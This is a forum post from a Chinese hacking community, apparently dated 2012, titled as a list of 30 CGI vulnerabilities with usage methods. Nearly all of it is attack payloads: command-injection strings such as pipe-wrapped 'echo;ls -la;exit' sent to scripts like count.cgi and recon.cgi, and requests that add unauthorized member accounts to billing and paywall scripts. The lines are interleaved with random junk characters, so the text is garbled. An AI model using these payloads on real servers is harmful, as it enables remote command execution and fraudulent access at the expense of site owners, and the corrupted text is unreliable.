找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2577|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
8 B" t% u; O* Y/ w! g1 w3 E. I- z. v. z) Y
/smspass.pl1 X7 r6 Z( Q) f4 U+ _
username=username&password=password
+ Q  c! x4 `9 F& g0 P( m- C6 L$ E# a8 K0 z# `+ r" ]4 }- Y
/index.cgi
, |5 _+ ~  t& M% ^wei=ren&gen=command
- Y  E, p8 T% \3 l7 R$ A2 t  ^" N7 Q( d
/passmaster.cgi
9 i4 i! n: ?8 ~7 j$ O: FAction=Add&Username=Username&Password=Password  X7 \) c: h' B% O/ ^
; @6 e' ?" t' q; ~" n
/accountcreate.cgi
% ^9 @* P% k5 n6 z! ^/ y' ]username=username&password=password&ref1=|echo;ls|0 T: Z% ?! A& a' C  Q/ H7 b
, E: c5 e0 A- R* i
/form.cgi
. `" _' u9 g% [. M$ {* L# Bname=xxxx&email=email&subject=xxxx&response=|echo;ls|
3 f- f3 s6 S# F7 T$ A% C9 q6 Q7 `$ ^" u# S8 U
/addusr.pl1 b8 |' W% ^  L  D& u
/cgi-bin/EuroDebit/addusr.pl
6 [6 h9 x8 ?0 Q( kuser=username&pass=Password&confirm=Password
# H7 O; i4 l  `
) t5 Z. j, C2 M+ w7 H$ Y/ccbill-local.asp/ s# F4 a4 w4 m$ o3 H/ Y1 V0 i6 D0 x
post_values=username:password8 n1 F, N/ n! R4 Z$ q/ n

7 e; l# O( c# F; E2 n/count.cgi
4 G4 I3 y- Q) R# }. vpinfile=|echo;ls -la;exit|6 t3 T' J3 G  b* N' f$ ], B
% ~8 P3 n0 ~+ f  ?( T( X- ^: e
/recon.cgi
; L+ B1 K7 o' L% k4 D5 J* W/recon.cgi?search
+ L( F" a! U3 S. O9 D( [. Hsearchoption=1&searchfor=|echo;ls -al;exit|
0 Q* x* f3 g1 ~2 \% o0 r) j4 b; V: s/ S0 b* k
/verotelrum.pl
9 S+ v8 x) e) F" b2 mvercode=username:password:dseegsow:add:amount<&30>
* e1 I, S( \: ]; `) a+ |+ ?0 E# H" r6 f$ x$ L* O
/af.cgi
, H3 ~( Y% R. H4 O_browser_out=|echo;ls -la;exit;|
( S7 S4 I% H- J% Q) f6 w
6 v: v* C! M# `" G" U4 X, ^1 S/modify.cgi
# E# x8 u9 z: ~( k4 P# `& a$ Nusername=username&password=password&expire=30
, k& d0 ]6 w0 t4 ~1 E. m) Z# x9 z0 p# S
/openjournal.cgi
; D. Q- k" `& \* Q8 ~edit=1&ct=2&go=|echo;ls -al;exit|, G8 o& m# g5 h7 N2 t9 L8 }
) l; b6 o$ h, P4 h0 ]
/gx9passwd.cgi) e- f& @6 b1 h, b( D) S: G
cmd=ADD&user=username&pass=password, y: p2 D0 b& ]+ b  @
0 G- C: F! I9 J9 e0 Y5 T
/probecontrol.cgi
& ]6 A/ f2 l) Dcommand=enable&username=username&password=password3 _- v( E; R  ]8 q) E2 w; ~% @# \

0 S. B1 H0 O4 g/recon.cgi: F; a; a2 q' m
searchoption=3&searchfor=echo;ls -la;exit, m% h, `6 Q0 V; g" H: ~
' B; Z% T, S5 v& K! n0 n+ x- u
/htadd.pl0 |: g1 O( L9 ^/ X" N( E
configfile=|echo; ls -alt; exit" X5 J" J" Y/ Z6 @! [8 W( T
, J( \$ `% J0 j9 w  R9 F& ?
/gx9passwd.cgi
  X9 d# ?4 q6 q7 e& t+ Ccmd=ADD&user=username&pass=password
6 ~0 W' `, t+ y+ b/ J& S2 \
4 _1 V& J$ U0 u+ i" l/ibill*.pl* d0 [8 x# S  u* o- U# k
reqtype=add&authpwd=authpwd&username=username&password=password
! w2 x$ v1 ^: O& N7 n& ^5 P! j+ Y4 X
* U- N! _- F1 K5 I5 l! C/cpay.cgi* V4 |4 Q" s4 L! m+ q
command=add_member&username=username(EMAIL)&password=password(DES)
0 ^( ^6 `2 l5 S7 P2 d4 D) y) G: O# ]1 ?/ X; l. s$ [5 o
/globill_ut.cgi
; z& Z& u- v6 y9 @% ^do=add&username=username&password=password&wpassword=password
, k- k) k* c5 ?6 s* e7 ^! E7 k$ u  B* t. z  I# [
/usercontrol.cgi7 d9 c% H3 ^0 E
command=enable&username=USER&password=PASS
4 A" Z9 _2 O% d5 Y+ {; G3 Z7 ?
* r' o" R- |0 X2 J- u' Q$ `/globoSALErum.cgi6 }, s) i9 |9 K' w# z9 |8 L: B
action=ADD&seccode=seccode&login=username&password=password+ b) {1 F$ L5 f
) X3 S4 T" {9 `4 ~2 L6 y
/addusr.pl' [' X2 Q% l3 Y
user=USER&pass=PASS&confirm=PASS0 f7 e/ Z- G2 r, C- t5 x

! E9 U7 z- F  k! b# {/ ^/pincount.cgi
7 U2 ^) ?, l9 w/cgi-bin/mastergate/pincount.cgi
, H' K; R* ]+ }  j2 k! opinfile=|echo;pwd;exit|6 f, A% R+ U! {$ T( a8 \0 B% F5 m

7 z- o- g) x+ g) Q1 i/accountcreate.cgi
7 p% N& c( N' j4 ?) U; W0 t$ w/cgi-bin/gateway/accountcreate.cgi
) V% A- i  \6 c. o# l  q$ _username=username&password=password&password2=password&ref1=|echo;ls -al;exit  s3 I- ]! G3 i1 B

$ ?. a8 J* q2 _& }' J$ r0 V+ {/af.cgi$ y* v& b7 w# K' l- n. L2 T
/env.cgi
7 ?" f, z+ U0 A; j( \ADD+;echo;pwd;exit
: x4 B* z0 E6 P  [: ~0 o  R! A
# B$ M5 Z9 p: D. o; `# r/count.cgi! f- `  O1 k8 S# S
pinfile=|echo;pwd;exit|
2 g4 a7 d. r, m, F( R9 ^# x( D4 i2 R' h5 Z9 t) G
/recon.cgi
9 b1 }" T# P3 m1 g, q6 Psearchoption=1&searchfor=|echo;ls%20-al;exit|
" w+ ]) E( W% B/ T5 D1 P3 M9 D1 ^" {! v1 @) j# z
/add.cgi
3 t1 G7 k; S, H% E$ d4 E( ~# ~) ^username=username&password=password&expire=308 Z% t: z5 [4 V' v  x
; C! b/ C5 j7 ~7 x0 I! w
==============================. B/ w$ W5 X: q6 ], G+ N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表